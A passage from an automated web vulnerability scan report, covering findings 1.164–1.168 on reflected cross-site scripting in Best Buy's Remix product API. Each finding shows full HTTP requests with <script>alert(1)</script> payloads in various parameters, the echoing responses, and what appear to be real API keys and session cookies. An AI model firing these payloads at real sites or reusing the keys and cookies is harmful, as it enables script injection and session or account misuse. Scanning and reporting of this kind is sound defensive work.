GET /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=9933863<script>alert(1)</script>d7fd7ee2f10&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "e8382132aec443124d5e36b9cead5d75"
X-Runtime: 4
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2390
Date: Thu, 11 Aug 2011 23:47:21 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
: "Couldn't understand '/v1/products(digitalSku>\"\"&sku in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=9933863<script>alert(1)</script>d7fd7ee2f10&format=json'",
"status": "400 Bad Request"
}
})

1.164. http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [show parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))

Issue detail

The value of the show request parameter is copied into the HTML document as plain text between tags. The payload 7bf34<script>alert(1)</script>10daab6be was submitted in the show parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku7bf34<script>alert(1)</script>10daab6be&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olstemplatemapper.jsp?_dyncharset=ISO-8859-1&id=pcat17071&type=page&ks=960&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&sc=Global&cp=1&sp=&qp=q383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f~~cpcmcat242800050021%23%231%23%236~~ncabcat0915000%23%232%23%236&list=y&usc=All+Categories&nrp=15&iht=n
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "c8a1aaf1166b56e42431a4111d6f647a"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2388
Date: Thu, 11 Aug 2011 23:47:17 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(digitalSku>\"\"&sku in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku7bf34<script>alert(1)</script>10daab6be&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json'",
"status": "400 Bad Request"
}
})

1.165. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c06e<script>alert(1)</script>0dcbfca45d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v17c06e<script>alert(1)</script>0dcbfca45d0/products(sku%20in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; CART=H4sIAAAAAAAAAJVTy27TQBS9SZu+G9pGLJEqPsBt0gcpLFBIHwTSJpCiStmgiX2TDJ2HOx6HmAUCiT1rBPwBm34FG9gg8RmwYceKGddOUyQWeGFZx+eee86duZ9+QC5QcNuV3OlgoDth5Hi0RzUqRRyDclQuOlJ5qBxfSReDQCqnKuUpxYZFV3+9f/vl/On9LEzUYYVXk5KaRl4TXRloWKo/IwOyFmrK1uo00HfqkOcNZbqIRjfW0LBywWFE9NZaWlHRM6wcP458PIOXkB36xmXBchyr41SMvciKDV9/u/HuM/k4AZkaTAb0BQ59AMg8nzTvOVN097+jXQ1wHg633zQ2+1m4WYP5LuGURS08O5JtmKLNvhRYgzyjAg0YonDxSO6afFUpTIxOqLHCdRtm+AHt6sOgZz+bVLv9mngAs/xRSISmOqrDdbdPmfd3dxs+U4cldwwfDaUOc65tQ1xd8xKk4OGAuriPRIcKK54nRZCILCAnlBlImaQJfeEU0d8bmkGakSfYPK8STZjsPcQogRZT6DF2R62m+J4VTK3wfaoCfUQ4jnRs5jhJWrJwMQbTn/Su0pixMKJNXFbk02lV3LGUc7yppBeOIdd4q09936Q4RN2XKTzDW1oqHJM7Ieb4hY5amujUwgo/UQYaH34a3DdXsiFY1FRmqlfv6a4MOwzNPZ21pJhgq6ZNVwuMHVM+QGVPpaKQtKmfWg6M42MZG9xnpKehMKZ+T0qGRBj5QuCjSwnbRUYHqCLLTSSWkl/xFqX4TLwB/3gyfvxoyKF4+qSlYbq8WSyVdkoJnHfpxs7O1q3N9fX1cqlskMVisVwsbxS3tsulzZKGqQMlQ+FpgAsps2PL8WJa205i++uqevX9w++fWci0ITcgLLR7abp2CQvisSwPTW8PuyRk+vLrD2JlK3iQBAAA; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "4748658f3be8e8a60938f067866e228d"
X-Runtime: 1
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2456
Date: Thu, 11 Aug 2011 23:50:22 GMT

busopsLow.BTP.retLoadBTPSKUs({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<Your
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v17c06e<script>alert(1)</script>0dcbfca45d0/products(sku in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoad
...[SNIP]...

1.166. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 820c8<script>alert(1)</script>201fb407b6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(sku%20in(8412292)820c8<script>alert(1)</script>201fb407b6d&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; CART=H4sIAAAAAAAAAJVTy27TQBS9SZu+G9pGLJEqPsBt0gcpLFBIHwTSJpCiStmgiX2TDJ2HOx6HmAUCiT1rBPwBm34FG9gg8RmwYceKGddOUyQWeGFZx+eee86duZ9+QC5QcNuV3OlgoDth5Hi0RzUqRRyDclQuOlJ5qBxfSReDQCqnKuUpxYZFV3+9f/vl/On9LEzUYYVXk5KaRl4TXRloWKo/IwOyFmrK1uo00HfqkOcNZbqIRjfW0LBywWFE9NZaWlHRM6wcP458PIOXkB36xmXBchyr41SMvciKDV9/u/HuM/k4AZkaTAb0BQ59AMg8nzTvOVN097+jXQ1wHg633zQ2+1m4WYP5LuGURS08O5JtmKLNvhRYgzyjAg0YonDxSO6afFUpTIxOqLHCdRtm+AHt6sOgZz+bVLv9mngAs/xRSISmOqrDdbdPmfd3dxs+U4cldwwfDaUOc65tQ1xd8xKk4OGAuriPRIcKK54nRZCILCAnlBlImaQJfeEU0d8bmkGakSfYPK8STZjsPcQogRZT6DF2R62m+J4VTK3wfaoCfUQ4jnRs5jhJWrJwMQbTn/Su0pixMKJNXFbk02lV3LGUc7yppBeOIdd4q09936Q4RN2XKTzDW1oqHJM7Ieb4hY5amujUwgo/UQYaH34a3DdXsiFY1FRmqlfv6a4MOwzNPZ21pJhgq6ZNVwuMHVM+QGVPpaKQtKmfWg6M42MZG9xnpKehMKZ+T0qGRBj5QuCjSwnbRUYHqCLLTSSWkl/xFqX4TLwB/3gyfvxoyKF4+qSlYbq8WSyVdkoJnHfpxs7O1q3N9fX1cqlskMVisVwsbxS3tsulzZKGqQMlQ+FpgAsps2PL8WJa205i++uqevX9w++fWci0ITcgLLR7abp2CQvisSwPTW8PuyRk+vLrD2JlK3iQBAAA; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web3.ATL
Etag: "db87ee437c972e7c7b84f17d46703a82"
X-Runtime: 2
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2456
Date: Thu, 11 Aug 2011 23:50:25 GMT

busopsLow.BTP.retLoadBTPSKUs({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<Your
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(sku in(8412292)820c8<script>alert(1)</script>201fb407b6d&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&forma
...[SNIP]...

1.167. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 564de<script>alert(1)</script>39279c9f405 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(sku%20in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs564de<script>alert(1)</script>39279c9f405&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; CART=H4sIAAAAAAAAAJVTy27TQBS9SZu+G9pGLJEqPsBt0gcpLFBIHwTSJpCiStmgiX2TDJ2HOx6HmAUCiT1rBPwBm34FG9gg8RmwYceKGddOUyQWeGFZx+eee86duZ9+QC5QcNuV3OlgoDth5Hi0RzUqRRyDclQuOlJ5qBxfSReDQCqnKuUpxYZFV3+9f/vl/On9LEzUYYVXk5KaRl4TXRloWKo/IwOyFmrK1uo00HfqkOcNZbqIRjfW0LBywWFE9NZaWlHRM6wcP458PIOXkB36xmXBchyr41SMvciKDV9/u/HuM/k4AZkaTAb0BQ59AMg8nzTvOVN097+jXQ1wHg633zQ2+1m4WYP5LuGURS08O5JtmKLNvhRYgzyjAg0YonDxSO6afFUpTIxOqLHCdRtm+AHt6sOgZz+bVLv9mngAs/xRSISmOqrDdbdPmfd3dxs+U4cldwwfDaUOc65tQ1xd8xKk4OGAuriPRIcKK54nRZCILCAnlBlImaQJfeEU0d8bmkGakSfYPK8STZjsPcQogRZT6DF2R62m+J4VTK3wfaoCfUQ4jnRs5jhJWrJwMQbTn/Su0pixMKJNXFbk02lV3LGUc7yppBeOIdd4q09936Q4RN2XKTzDW1oqHJM7Ieb4hY5amujUwgo/UQYaH34a3DdXsiFY1FRmqlfv6a4MOwzNPZ21pJhgq6ZNVwuMHVM+QGVPpaKQtKmfWg6M42MZG9xnpKehMKZ+T0qGRBj5QuCjSwnbRUYHqCLLTSSWkl/xFqX4TLwB/3gyfvxoyKF4+qSlYbq8WSyVdkoJnHfpxs7O1q3N9fX1cqlskMVisVwsbxS3tsulzZKGqQMlQ+FpgAsps2PL8WJa205i++uqevX9w++fWci0ITcgLLR7abp2CQvisSwPTW8PuyRk+vLrD2JlK3iQBAAA; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "7e4ec97c16be3ce5d171449ceacb15d0"
X-Runtime: 35
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 485
Date: Thu, 11 Aug 2011 23:50:11 GMT

busopsLow.BTP.retLoadBTPSKUs564de<script>alert(1)</script>39279c9f405({
"queryTime": "0.005",
"currentPage": 1,
"totalPages": 0,
"partial": false,
"from": 1,
"total": 0,
"to": 0,
"products": [

],
"canonicalUrl": "/v1/products(sku in(8412292)&(depart
...[SNIP]...

1.168. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bbyremix.bestbuy.com
Path:   /v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 82b98<script>alert(1)</script>79e8fa433a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(sku%20in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json&82b98<script>alert(1)</script>79e8fa433a0=1 HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
